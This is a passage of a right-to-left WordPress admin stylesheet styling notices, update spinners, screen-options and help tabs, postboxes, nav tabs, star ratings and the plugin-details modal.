.media-toolbar-primary, .wp-filter .media-toolbar-secondary, .wp-filter .search-form { float: none; /* Remove float from media-views.css */ position: relative; max-width: 100%; } .wp-filter .search-form { margin: 11px 0; flex-wrap: wrap; row-gap: 10px; } } @media only screen and (max-width: 782px) { .filter-group li { padding: 0; width: 50%; } .wp-filter .search-form input[type="search"] { min-height: 40px; padding: 0 12px; } .wp-filter .search-form select, .wp-filter .filter-items select { min-height: 40px; padding: 0 12px 0 24px; } } @media only screen and (max-width: 320px) { .filter-count { display: none; } .wp-filter .drawer-toggle { margin: 10px 0; } .filter-group li, .wp-filter .search-form input[type="search"] { width: 100%; } } /*------------------------------------------------------------------------------ 4.0 - Notifications ------------------------------------------------------------------------------*/ .notice, div.updated, div.error { background: #fff; border: none; border-right: 4px solid #c3c4c7; box-shadow: none; margin: 5px 15px 2px; padding: 8px 12px; } div[class="update-message"] { /* back-compat for pre-4.6 */ padding: 0.5em 0 0.5em 12px; } .notice p, .notice-title, div.updated p, div.error p, .form-table td .notice p { margin: 0.5em 0; padding: 0; font-size: 13px; line-height: 1.54; color: #1e1e1e; } div.notice a, div.error a, div.updated a { color: var(--wp-admin-theme-color-darker-10); text-decoration: underline; } div.notice a:hover, div.error a:hover, div.updated a:hover { color: var(--wp-admin-theme-color-darker-20); } div.notice a:focus, div.error a:focus, div.updated a:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline: 2px solid transparent; border-radius: 2px; } .notice-alt { box-shadow: none; } .notice-large { padding: 10px 20px; } .notice-title { display: inline-block; color: #1d2327; font-size: 18px; } .wp-core-ui .notice.is-dismissible { padding-left: 48px; position: relative; } .notice-dismiss { position: absolute; top: 12px; left: 12px; border: none; margin: 0; padding: 0; background: none; color: #1e1e1e; cursor: pointer; width: 24px; height: 24px; display: flex; align-items: center; justify-content: center; border-radius: 2px; } .notice-dismiss:hover:before, .notice-dismiss:active:before { color: #1e1e1e; opacity: 0.7; } .notice-dismiss:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .notice-dismiss:focus:before { color: #1e1e1e; } .notice-success, div.updated { border-right-color: #4ab866; background-color: #eff9f1; } .notice-success.notice-alt, div.updated.notice-alt { background-color: #eff9f1; } .notice-warning { border-right-color: #f0b849; background-color: #fef8ee; } .notice-warning.notice-alt { background-color: #fef8ee; } .notice-error, div.error { border-right-color: #cc1818; background-color: #fcf0f0; } .notice-error.notice-alt, div.error.notice-alt { background-color: #fcf0f0; } .notice-info { border-right-color: #3858e9; background-color: #fff; } .notice-info.notice-alt { background-color: #fff; } #plugin-information-footer .update-now:not(.button-disabled):before { color: #d63638; content: "\f463"; content: "\f463" / ''; display: inline-block; font: normal 20px/1 dashicons; margin: -3px -2px 0 5px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: middle; } #plugin-information-footer .notice { margin-top: -5px; } .update-message p:before, .updating-message p:before, .updated-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.updated-message:before, .button.installed:before, .button.installing:before, .button.activating-message:before, .button.activated-message:before { display: inline-block; font: normal 20px/1 'dashicons'; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: top; } .wrap .notice, .wrap div.updated, .wrap div.error, .media-upload-form .notice, .media-upload-form div.error { margin: 5px 0 15px; } .wrap #templateside .notice { display: block; margin: 0; padding: 5px 8px; font-weight: 600; text-decoration: none; } .wrap #templateside span.notice { margin-right: -12px; } #templateside li.notice a { padding: 0; } /* Update icon. */ .update-message p:before, .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before { color: #d63638; content: "\f463"; content: "\f463" / ''; } /* Spins the update icon. */ .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before, .plugins .column-auto-updates .dashicons-update.spin, .theme-overlay .theme-autoupdate .dashicons-update.spin { animation: rotation 2s infinite linear; } @media (prefers-reduced-motion: reduce) { .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before, .plugins .column-auto-updates .dashicons-update.spin, .theme-overlay .theme-autoupdate .dashicons-update.spin { animation: none; } } .theme-overlay .theme-autoupdate .dashicons-update.spin { margin-left: 3px; } /* Updated icon (check mark). */ .updated-message p:before, .installed p:before, .button.updated-message:before, .button.activated-message:before { color: #68de7c; content: "\f147"; content: "\f147" / ''; } /* Error icon. */ .update-message.notice-error p:before { color: #d63638; content: "\f534"; content: "\f534" / ''; } .wrap .notice p:before, .import-php .updating-message:before { margin-left: 6px; } .import-php .updating-message:before { vertical-align: bottom; } #update-nag, .update-nag { display: inline-block; line-height: 1.4; padding: 11px 15px; font-size: 14px; margin: 25px 2px 0 20px; } ul#dismissed-updates { display: none; } #dismissed-updates li > p { margin-top: 0; } #dismiss, #undismiss { margin-right: 0.5em; } form.upgrade { margin-top: 8px; } form.upgrade .hint { font-style: italic; font-size: 85%; margin: -0.5em 0 2em; } .update-php .spinner { float: none; margin: -4px 0; } h2.wp-current-version { margin-bottom: .3em; } p.update-last-checked { margin-top: 0; } p.auto-update-status { margin-top: 2em; line-height: 1.8; } #ajax-loading, .ajax-loading, .ajax-feedback, .imgedit-wait-spin, .list-ajax-loading { /* deprecated */ visibility: hidden; } #ajax-response.alignleft { margin-right: 2em; } .button.updating-message:before, .button.updated-message:before, .button.installed:before, .button.installing:before, .button.activated-message:before, .button.activating-message:before { margin: 0 -2px 0 5px; line-height: 1.9; /* 38px (20px * 1.9) - matches button */ vertical-align: top; } #plugin-information-footer .button { padding: 0 14px; line-height: 2.71428571; /* 38px */ font-size: 14px; vertical-align: middle; min-height: 40px; margin-bottom: 4px; } #plugin-information-footer .button.installed:before, #plugin-information-footer .button.installing:before, #plugin-information-footer .button.updating-message:before, #plugin-information-footer .button.updated-message:before, #plugin-information-footer .button.activated-message:before, #plugin-information-footer .button.activating-message:before { margin: 0 -2px 0 5px; line-height: 1.9; /* 38px (20px * 1.9) - matches button */ vertical-align: top; } #plugin-information-footer .button.update-now.updating-message:before { margin: 0 -2px 0 5px; } .button-primary.updating-message:before, .button-primary.activating-message:before { color: #fff; } .button-primary.updated-message:before, .button-primary.activated-message:before { color: #9ec2e6; } .button.updated-message, .button.activated-message { transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } /* @todo: this does not need its own section anymore */ /*------------------------------------------------------------------------------ 6.0 - Admin Header ------------------------------------------------------------------------------*/ #adminmenu a, #taglist a, #catlist a { text-decoration: none; } /*------------------------------------------------------------------------------ 6.1 - Screen Options Tabs ------------------------------------------------------------------------------*/ #screen-options-wrap, #contextual-help-wrap { margin: 0; padding: 8px 20px 12px; position: relative; } #contextual-help-wrap { overflow: auto; margin-right: 0; } #screen-meta-links { float: left; margin: 0 0 0 20px; } /* screen options and help tabs revert */ #screen-meta { display: none; margin: 0 0 -1px 20px; position: relative; background-color: #fff; border: 1px solid #c3c4c7; border-top: none; box-shadow: 0 0 0 transparent; } #screen-options-link-wrap, #contextual-help-link-wrap { float: right; margin: 0 6px 0 0; } #screen-meta-links .screen-meta-toggle { position: relative; top: 0; } #screen-meta-links .show-settings { border: 1px solid #c3c4c7; border-top: none; height: auto; margin-bottom: 0; padding: 0 16px 0 6px; background: #fff; border-radius: 0 0 4px 4px; color: #646970; box-shadow: 0 0 0 transparent; transition: box-shadow 0.1s linear; } #screen-meta-links .show-settings:hover, #screen-meta-links .show-settings:active, #screen-meta-links .show-settings:focus { color: #2c3338; } #screen-meta-links .show-settings:focus { border-color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #screen-meta-links .show-settings:active { transform: none; } #screen-meta-links .show-settings:after { left: 0; content: "\f140"; content: "\f140" / ''; font: normal 20px/1.5 dashicons; /* line-height 1.5 = 30px to match compact button */ display: inline-block; padding: 0 0 0 5px; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } #screen-meta-links .screen-meta-active:after { content: "\f142"; content: "\f142" / ''; } /* end screen options and help tabs */ .toggle-arrow { background-repeat: no-repeat; background-position: top right; background-color: transparent; height: 22px; line-height: 22px; display: block; } .toggle-arrow-active { background-position: bottom right; } #screen-options-wrap h5, /* Back-compat for old plugins */ #screen-options-wrap legend, #contextual-help-wrap h5 { margin: 0; padding: 8px 0; font-size: 13px; font-weight: 600; } .metabox-prefs label { display: inline-block; padding-left: 15px; line-height: 2.35; } #number-of-columns { display: inline-block; vertical-align: middle; line-height: 30px; } .metabox-prefs input[type=checkbox] { margin-top: 0; margin-left: 6px; } .metabox-prefs label input, .metabox-prefs label input[type=checkbox] { margin: -4px 0 0 5px; } .metabox-prefs .columns-prefs label input { margin: -1px 0 0 2px; } .metabox-prefs label a { display: none; } .metabox-prefs .screen-options input, .metabox-prefs .screen-options label { margin-top: 0; margin-bottom: 0; vertical-align: middle; } .metabox-prefs .screen-options .screen-per-page { margin-left: 15px; padding-left: 0; } .metabox-prefs .screen-options label { line-height: 2.2; padding-left: 0; } .screen-options + .screen-options { margin-top: 10px; } .metabox-prefs .submit { margin-top: 1em; padding: 0; } /*------------------------------------------------------------------------------ 6.2 - Help Menu ------------------------------------------------------------------------------*/ #contextual-help-wrap { padding: 0; } #contextual-help-columns { position: relative; } #contextual-help-back { position: absolute; top: 0; bottom: 0; right: 150px; left: 170px; border: 1px solid #c3c4c7; border-top: none; border-bottom: none; background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } #contextual-help-wrap.no-sidebar #contextual-help-back { left: 0; border-left-width: 0; border-bottom-left-radius: 2px; } .contextual-help-tabs { float: right; width: 150px; margin: 0; } .contextual-help-tabs ul { margin: 1em 0; } .contextual-help-tabs li { margin-bottom: 0; list-style-type: none; border-style: solid; border-width: 0 2px 0 0; border-color: transparent; } .contextual-help-tabs a { display: block; padding: 5px 12px 5px 5px; line-height: 1.4; text-decoration: none; border: 1px solid transparent; border-left: none; border-right: none; } .contextual-help-tabs a:hover { color: #2c3338; } .contextual-help-tabs .active { padding: 0; margin: 0 0 0 -1px; border-right: 2px solid var(--wp-admin-theme-color); background: color-mix(in srgb, var(--wp-admin-theme-color) 8%, white); box-shadow: 0 2px 0 rgba(0, 0, 0, 0.02), 0 1px 0 rgba(0, 0, 0, 0.02); } .contextual-help-tabs .active a { border-color: #c3c4c7; color: #2c3338; } .contextual-help-tabs-wrap { padding: 0 20px; overflow: auto; } .help-tab-content { display: none; margin: 0 0 12px 22px; line-height: 1.6; } .help-tab-content.active { display: block; } .help-tab-content ul li { list-style-type: disc; margin-right: 18px; } .contextual-help-sidebar { width: 150px; float: left; padding: 0 12px 0 8px; overflow: auto; } /*------------------------------------------------------------------------------ 8.0 - Layout Blocks ------------------------------------------------------------------------------*/ html.wp-toolbar { padding-top: var(--wp-admin--admin-bar--height); box-sizing: border-box; -ms-overflow-style: scrollbar; /* See ticket #48545 */ } .widefat th, .widefat td { color: #50575e; } .widefat th, .widefat thead td, .widefat tfoot td { font-weight: 400; } .widefat thead tr th, .widefat thead tr td, .widefat tfoot tr th, .widefat tfoot tr td { color: #2c3338; } .widefat td p { margin: 2px 0 0.8em; } .widefat p, .widefat ol, .widefat ul { color: #2c3338; } .widefat .column-comment p { margin: 0.6em 0; } .widefat .column-comment ul { list-style: initial; margin-right: 2em; } /* Screens with postboxes */ .postbox-container { float: right; } .postbox-container .meta-box-sortables { box-sizing: border-box; } #wpbody-content .metabox-holder { padding-top: 10px; } .metabox-holder .postbox-container .meta-box-sortables { /* The jQuery UI Sortables need some initial height to work properly. */ min-height: 1px; position: relative; } #post-body-content { width: 100%; min-width: 463px; float: right; } #post-body.columns-2 #postbox-container-1 { float: left; margin-left: -300px; width: 280px; } #post-body.columns-2 #side-sortables { min-height: 250px; } /* one column on the dash */ @media only screen and (max-width: 799px) { #wpbody-content .metabox-holder .postbox-container .empty-container { outline: none; height: 0; min-height: 0; } } .js .widget .widget-top, .js .postbox .hndle { cursor: move; } .js .widget .widget-top.is-non-sortable, .js .postbox .hndle.is-non-sortable { cursor: auto; } /* Configurable dashboard widgets "Configure" edit-box link. */ .hndle a { font-size: 12px; font-weight: 400; } .postbox-header { display: flex; align-items: center; justify-content: space-between; border-bottom: 1px solid #c3c4c7; } .postbox-header .hndle { flex-grow: 1; /* Handle the alignment for the configurable dashboard widgets "Configure" edit-box link. */ display: flex; justify-content: space-between; align-items: center; } .postbox-header .handle-actions { flex-shrink: 0; } /* Post box order and toggle buttons. */ .postbox .handle-order-higher, .postbox .handle-order-lower, .postbox .handlediv { width: 1.62rem; height: 1.62rem; margin: 0; padding: 0; border: 0; background: none; cursor: pointer; } .postbox .handle-order-higher, .postbox .handle-order-lower { color: #646970; width: 1.62rem; } /* Post box order buttons in the block editor meta boxes area. */ .edit-post-meta-boxes-area .postbox .handle-order-higher, .edit-post-meta-boxes-area .postbox .handle-order-lower { width: 44px; height: 44px; color: #1d2327 } .postbox .handle-order-higher[aria-disabled="true"], .postbox .handle-order-lower[aria-disabled="true"] { cursor: default; color: #a7aaad; } .sortable-placeholder:not(.empty-container .sortable-placeholder) { border: 1px dashed #c3c4c7; border-radius: 8px; margin-bottom: 20px; } .postbox, .stuffbox { margin-bottom: 20px; padding: 0; line-height: 1; } .postbox.closed .postbox-header { border-bottom: 0; } /* user-select is not a part of the CSS standard - may change behavior in the future */ .postbox .hndle, .stuffbox .hndle { -webkit-user-select: none; user-select: none; } .postbox .inside { padding: 0 12px 12px; line-height: 1.4; font-size: 13px; } .stuffbox .inside { padding: 0; line-height: 1.4; font-size: 13px; margin-top: 0; } .postbox .inside { margin: 11px 0; position: relative; } .postbox .inside > p:last-child, .rss-widget ul li:last-child { margin-bottom: 1px !important; } .postbox.closed h3 { border: none; box-shadow: none; } .postbox table.form-table { margin-bottom: 0; } .postbox table.widefat { box-shadow: none; } .temp-border { border: 1px dotted #c3c4c7; } .columns-prefs label { padding: 0 0 0 10px; } /* @todo: what is this doing here */ #dashboard_right_now .versions .b, #post-status-display, #post-visibility-display, #adminmenu .wp-submenu li.current, #adminmenu .wp-submenu li.current a, #adminmenu .wp-submenu li.current a:hover, .media-item .percent, .plugins .name, #pass-strength-result.strong, #pass-strength-result.short, #ed_reply_toolbar #ed_reply_strong, .item-controls .item-order a, .feature-filter .feature-name, #comment-status-display { font-weight: 600; } /*------------------------------------------------------------------------------ 21.0 - Admin Footer ------------------------------------------------------------------------------*/ #wpfooter { position: absolute; bottom: 0; right: 0; left: 0; padding: 10px 20px; color: #50575e; } #wpfooter p { font-size: 13px; margin: 0; line-height: 1.55; } #footer-thankyou { font-style: italic; } /*------------------------------------------------------------------------------ 25.0 - Tabbed Admin Screen Interface (Experimental) ------------------------------------------------------------------------------*/ .nav-tab { float: right; border: 1px solid #c3c4c7; border-bottom: none; margin-right: 0.5em; /* half the font size so set the font size properly */ padding: 5px 10px; font-size: 14px; line-height: 1.71428571; font-weight: 600; background: #dcdcde; color: #50575e; text-decoration: none; white-space: nowrap; } h3 .nav-tab, /* Back-compat for pre-4.4 */ .nav-tab-small .nav-tab { padding: 5px 14px; font-size: 12px; line-height: 1.33; } .nav-tab:hover, .nav-tab:focus { background-color: #fff; color: #3c434a; } .nav-tab-active, .nav-tab:focus:active { box-shadow: none; } .nav-tab-active { margin-bottom: -1px; color: #3c434a; } .nav-tab-active, .nav-tab-active:hover, .nav-tab-active:focus, .nav-tab-active:focus:active { border-bottom: 1px solid #f0f0f1; background: #f0f0f1; color: #000; } h1.nav-tab-wrapper, /* Back-compat for pre-4.4 */ .wrap h2.nav-tab-wrapper, /* higher specificity to override .wrap > h2:first-child */ .nav-tab-wrapper { border-bottom: 1px solid #c3c4c7; margin: 0; padding-top: 9px; padding-bottom: 0; line-height: inherit; } /* Back-compat for plugins. Deprecated. Use .wp-clearfix instead. */ .nav-tab-wrapper:not(.wp-clearfix):after { content: ""; display: table; clear: both; } /*------------------------------------------------------------------------------ 26.0 - Misc ------------------------------------------------------------------------------*/ .spinner { background: url(../images/spinner.gif) no-repeat; background-size: 20px 20px; display: inline-block; visibility: hidden; float: left; vertical-align: middle; opacity: 0.7; filter: alpha(opacity=70); width: 20px; height: 20px; margin: 10px 10px 0; } .spinner.is-active, .loading-content .spinner { visibility: visible; } #template > div { margin-left: 16em; } #template .notice { margin-top: 1em; margin-left: 3%; } #template .notice p { width: auto; } #template .submit .spinner { float: none; vertical-align: top; } .metabox-holder .stuffbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder .postbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder h3.hndle, /* Back-compat for pre-4.4 */ .metabox-holder h2.hndle { font-size: 14px; padding: 8px 12px; margin: 0; line-height: 1.4; } /* Back-compat for nav-menus screen */ .nav-menus-php .metabox-holder h3 { padding: 0; } .accordion-container h3.accordion-section-title { padding: 0 !important; } .accordion-section-title button.accordion-trigger, .nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger { background: inherit; color: #1d2327; display: block; position: relative; text-align: right; width: 100%; outline: none; border: 0; padding: 10px 14px 11px 10px; line-height: 1.5; cursor: pointer; } .accordion-section-title button.accordion-trigger:focus, .nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); outline: 2px solid transparent; } .accordion-section-title span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down { position: absolute; left: 10px; right: auto; color: #787c82; border-radius: 50px; top: 50%; transform: translateY(-50%); } .accordion-section-title:hover span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section-title:hover span.dashicons.dashicons-arrow-down { color: #1d2327; } .accordion-section-title span.dashicons.dashicons-arrow-down::before, .nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down::before { position: relative; right: -1px; } .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down { transform: rotate(-180deg) translate(0, 50%); } #templateside ul li a { text-decoration: none; } .plugin-install #description, .plugin-install-network #description { width: 60%; } table .vers, table .column-visible, table .column-rating { text-align: right; } .attention, .error-message { color: #d63638; font-weight: 600; } /* Scrollbar fix for bulk upgrade iframe */ body.iframe { height: 98%; } /* Upgrader styles, Specific to Language Packs */ .lp-show-latest p { display: none; } .lp-show-latest p:last-child, .lp-show-latest .lp-error p { display: block; } /* - Only used once or twice in all of WP - deprecate for global style ------------------------------------------------------------------------------*/ .media-icon { width: 62px; /* icon + border */ text-align: center; } .media-icon img { border: 1px solid #dcdcde; border: 1px solid rgba(0, 0, 0, 0.07); } #howto { font-size: 11px; margin: 0 5px; display: block; } .importers { font-size: 16px; width: auto; } .importers td { padding-left: 14px; line-height: 1.4; } .importers .import-system { max-width: 250px; } .importers td.desc { max-width: 500px; } .importer-title, .importer-desc, .importer-action { display: block; } .importer-title { color: #000; font-size: 14px; font-weight: 400; margin-bottom: .2em; } .importer-action { line-height: 1.55; /* Same as with .updating-message */ color: #50575e; margin-bottom: 1em; } #post-body #post-body-content #namediv h3, /* Back-compat for pre-4.4 */ #post-body #post-body-content #namediv h2 { margin-top: 0; } .edit-comment-author { color: #1d2327; border-bottom: 1px solid #f0f0f1; } #namediv h3 label, /* Back-compat for pre-4.4 */ #namediv h2 label { vertical-align: baseline; } #namediv table { width: 100%; } #namediv td.first { width: 10px; white-space: nowrap; } #namediv input { width: 100%; } #namediv p { margin: 10px 0; } /* - Used - but could/should be deprecated with a CSS reset ------------------------------------------------------------------------------*/ .zerosize { height: 0; width: 0; margin: 0; border: 0; padding: 0; overflow: hidden; position: absolute; } br.clear { height: 2px; line-height: 0.15; } .checkbox { border: none; margin: 0; padding: 0; } fieldset { border: 0; padding: 0; margin: 0; } .post-categories { display: inline; margin: 0; padding: 0; } .post-categories li { display: inline; } /* Star Ratings - Back-compat for pre-3.8 */ div.star-holder { position: relative; height: 17px; width: 100px; background: url(../images/stars.png?ver=20121108) repeat-x bottom right; } div.star-holder .star-rating { background: url(../images/stars.png?ver=20121108) repeat-x top right; height: 17px; float: right; } /* Star Ratings */ .star-rating { white-space: nowrap; } .star-rating .star { display: inline-block; width: 20px; height: 20px; -webkit-font-smoothing: antialiased; font-size: 20px; line-height: 1; font-family: dashicons; text-decoration: inherit; font-weight: 400; font-style: normal; vertical-align: top; transition: color .1s ease-in; text-align: center; color: #dba617; } .star-rating .star-full:before { content: "\f155"; content: "\f155" / ''; } .star-rating .star-half:before { content: "\f459"; content: "\f459" / ''; } .rtl .star-rating .star-half { transform: rotateY(-180deg); } .star-rating .star-empty:before { content: "\f154"; content: "\f154" / ''; } div.action-links { font-weight: 400; margin: 6px 0 0; } /* Plugin install thickbox */ #plugin-information { background: #fff; position: fixed; top: 0; left: 0; bottom: 0; right: 0; height: 100%; padding: 0; } #plugin-information-scrollable { overflow: auto; -webkit-overflow-scrolling: touch; height: 100%; } #plugin-information-title { padding: 0 26px; background: #f6f7f7; font-size: 22px; font-weight: 600; line-height: 2.4; position: relative; height: 56px; } #plugin-information-title.with-banner { margin-left: 0; height: 250px; background-size: cover; } #plugin-information-title h2 { font-size: 1em; font-weight: 600; padding: 0; margin: 0; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } #plugin-information-title.with-banner h2 { position: relative; font-family: "Helvetica Neue", sans-serif; display: inline-block; font-size: 30px; line-height: 1.68; box-sizing: border-box; max-width: 100%; padding: 0 15px; margin-top: 174px; color: #fff; background: rgba(29, 35, 39, 0.9); text-shadow: 0 1px 3px rgba(0, 0, 0, 0.4); box-shadow: 0 0 30px rgba(255, 255, 255, 0.1); border-radius: 8px; } #plugin-information-title div.vignette { display: none; } #plugin-information-title.with-banner div.vignette { position: absolute; display: block; top: 0; right: 0; height: 250px; width: 100%; background: transparent; box-shadow: inset 0 0 50px 4px rgba(0, 0, 0, 0.2), inset 0 -1px 0 rgba(0, 0, 0, 0.1); } #plugin-information-tabs { padding: 0 16px; position: relative; left: 0; right: 0; min-height: 36px; font-size: 0; z-index: 1; border-bottom: 1px solid #dcdcde; background: #f6f7f7; } #plugin-information-tabs a { position: relative; display: inline-block; padding: 9px 10px; margin: 0; height: 18px; line-height: 1.3; font-size: 14px; text-decoration: none; transition: none; } #plugin-information-tabs a.current { margin: 0 -1px -1px; background: #fff; border: 1px solid #dcdcde; border-bottom-color: #fff; padding-top: 8px; color: #2c3338; } #plugin-information-tabs.with-banner a.current { border-top: none; padding-top: 9px; } #plugin-information-tabs a:active, #plugin-information-tabs a:focus { outline: none; } #plugin-information-content { overflow: hidden; /* equal height column trick */ background: #fff; position: relative; top: 0; left: 0; right: 0; min-height: 100%; /* Height of title + tabs + install now */ min-height: calc( 100% - 152px ); } #plugin-information-content.with-banner { /* Height of banner + tabs + install now */ min-height: calc( 100% - 346px ); } #section-holder { position: relative; top: 0; left: 250px; bottom: 0; right: 0; margin-top: 10px; margin-left: 250px; /* FYI box */ padding: 10px 26px 99999px; /* equal height column trick */ margin-bottom: -99932px; /* 67px less than the padding below to accommodate footer height */ } #section-holder .notice { margin: 5px 0 15px; } #section-holder .updated { margin: 16px 0; } #plugin-information .fyi { float: left; position: relative; top: 0; left: 0; padding: 16px 16px 99999px; /* equal height column trick */ margin-bottom: -99932px; /* 67px less than the padding below to accommodate footer height */ width: 217px; border-right: 1px solid #dcdcde; background: #f6f7f7; color: #646970; } #plugin-information .fyi strong { color: #3c434a; } #plugin-information .fyi h3 { font-weight: 600; text-transform: uppercase; font-size: 12px; color: #646970; margin: 24px 0 8px; } #plugin-information .fyi h2 { font-size: 0.9em; margin-bottom: 0; margin-left: 0; } #plugin-information .fyi ul { padding: 0; margin: 0; list-style: none; } #plugin-information .fyi li { margin: 0 0 10px; } #plugin-information .fyi-description { margin-top: 0; } #plugin-information .counter-container { margin: 3px 0; } #plugin-information .counter-label { float: right; margin-left: 5px; min-width: 55px; } #plugin-information .counter-back { height: 17px; width: 92px; background-color: #dcdcde; float: right; } #plugin-information .counter-bar { height: 17px; background-color: #f0c33c; /* slightly lighter than stars due to larger expanse */ float: right; } #plugin-information .counter-count { margin-right: 5px; } #plugin-information .fyi ul.contributors { margin-top: 10px; } #plugin-information .fyi ul.contributors li { display: inline-block; margin-left: 8px; vertical-align: middle; } #plugin-information .fyi ul.contributors li { display: inline-block; margin-left: 8px; vertical-align: middle; } #plugin-information .fyi ul.contributors li img { vertical-align: middle; margin-left: 4px; } #plugin-information-footer { padding: 13px 16px; position: absolute; left: 0; bottom: 0; right: 0; height: 40px; /* actual height: 40+13+13+1=67 */ border-top: 1px solid #dcdcde; background: #f6f7f7; } /* rtl:ignore */ #plugin-information .section { direction: ltr; } /* rtl:ignore */ #plugin-information .section ul, #plugin-information .section ol { list-style-type: disc; margin-left: 24px; } #plugin-information .section, #plugin-information .section p { font-size: 14px; line-height: 1.7; } #plugin-information #section-screenshots ol { list-style: none; margin: 0; } #plugin-information #section-screenshots li img { vertical-align: text-top; margin-top: 16px; max-width: 100%; width: auto; height: auto; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.3); } /* rtl:ignore */ #plugin-information #section-screenshots li p { font-style: italic; padding-left: 20px; } #plugin-information pre { padding: 7px; overflow: auto; border: 1px solid #c3c4c7; } #plugin-information blockquote { border-right: 2px solid #dcdcde; color: #646970; font-style: italic; margin: 1em 0; padding: 0 1em 0 0; } /* rtl:ignore */ #plugin-information .review { overflow: hidden; /* clearfix */ width: 100%; margin-bottom: 20px; border-bottom: 1px solid #dcdcde; } #plugin-information .review-title-section { overflow: hidden; /* clearfix */ } /* rtl:ignore */ #plugin-information .review-title-section h4 { display: inline-block; float: left; margin: 0 6px 0 0; } #plugin-information .reviewer-info p { clear: both; margin: 0; padding-top: 2px; } /* rtl:ignore */ #plugin-information .reviewer-info .avatar { float: left; margin: 4px 6px 0 0; } /* rtl:ignore */ #plugin-information .reviewer-info .star-rating { float: left; } /* rtl:ignore */ #plugin-information .review-meta { float: left; margin-left: 0.75em; } /* rtl:ignore */ #plugin-information .review-body { float: left; width: 100%; } .plugin-version-author-uri { font-size: 13px; } /* For non-js plugin installation screen ticket #36430. */ .update-php .button.button-primary { margin-left: 1em; } @media screen and (max-width: 771px) { #plugin-information-title.with-banner { height: 100px; } #plugin-information-title.with-banner h2 { margin-top: 30px; font-size: 20px; line-height: 2; max-width: 85%; } #plugin-information-title.with-banner div.vignette { height: 100px; } #plugin-information-tabs { overflow: hidden; /* clearfix */ padding: 0; height: auto; /* let tabs wrap */ } #plugin-information-tabs a.current { margin-bottom: 0; border-bottom: none; } #plugin-information .fyi { float: none; border: 1px solid #dcdcde; position: static; width: auto; margin: 26px 26px 0; padding-bottom: 0; /* reset from the two column height fix */ } #section-holder { position: static; margin: 0; padding-bottom: 70px; /* reset from the two column height fix, plus accommodate footer */ } #plugin-information .fyi h3, #plugin-information .fyi small { display: none; } #plugin-information-footer { padding: 12px 16px 0; height: 46px; } } /* Thickbox for the Plugin details modal. */ #TB_window.plugin-details-modal { background: #fff; } #TB_window.plugin-details-modal.thickbox-loading:before { content: ""; display: block; width: 20px; height: 20px; position: absolute; right: 50%; top: 50%; z-index: -1; margin: -10px -10px 0 0; background: #fff url(../images/spinner.gif) no-repeat center; background-size: 20px 20px; transform: translateZ(0); } @media print, (min-resolution: 120dpi) { #TB_window.plugin-details-modal.thickbox-loading:before { background-image: url(../images/spinner-2x.gif); } } .plugin-details-modal #TB_title { float: right; height: 1px; } .plugin-details-modal #TB_ajaxWindowTitle { display: none; } .plugin-details-modal #TB_closeWindowButton { right: auto; left: -30px; color: #f0f0f1; } .plugin-details-modal #TB_closeWindowButton:hover, .plugin-details-modal #TB_closeWindowButton:focus { outline: none; box-shadow: none; } .plugin-details-modal #TB_closeWindowButton:hover::after, .plugin-details-modal #TB_closeWindowButton:focus::after { outline: 2px solid; outline-offset: -4px; border-radius: 4px; } .plugin-details-modal .tb-close-icon { display: none; } .plugin-details-modal #TB_closeWindowButton:after { content: "\f335"; content: "\f335" / ''; font: normal 32px/29px 'dashicons'; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* move plugin install close icon to top on narrow screens */ @media screen and (max-width: 830px) { .plugin-details-modal #TB_closeWindowButton { left: 0; top: -30px; } } /* @todo: move this. */ img { border: none; } /* Metabox collapse arrow indicators */ .sidebar-name .toggle-indicator::before, .meta-box-sortables .postbox .toggle-indicator::before, .meta-box-sortables .postbox .order-higher-indicator::before, .meta-box-sortables .postbox .order-lower-indicator::before, .bulk-action-notice .toggle-indicator::before, .privacy-text-box .toggle-indicator::before { content: "\f142"; content: "\f142" / ''; display: inline-block; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } .js .widgets-holder-wrap.closed .toggle-indicator::before, .meta-box-sortables .postbox.closed .handlediv .toggle-indicator::before, .bulk-action-notice .bulk-action-errors-collapsed .toggle-indicator::before, .privacy-text-box.closed .toggle-indicator::before { content: "\f140"; content: "\f140" / ''; } .postbox .handle-order-higher .order-higher-indicator::before { content: "\f343"; content: "\f343" / ''; color: inherit; } .postbox .handle-order-lower .order-lower-indicator::before { content: "\f347"; content: "\f347" / ''; color: inherit; } .postbox .handle-order-higher .order-higher-indicator::before, .postbox .handle-order-lower .order-lower-indicator::before { position: relative; top: 0.11rem; width: 20px; height: 20px; } .postbox .handlediv 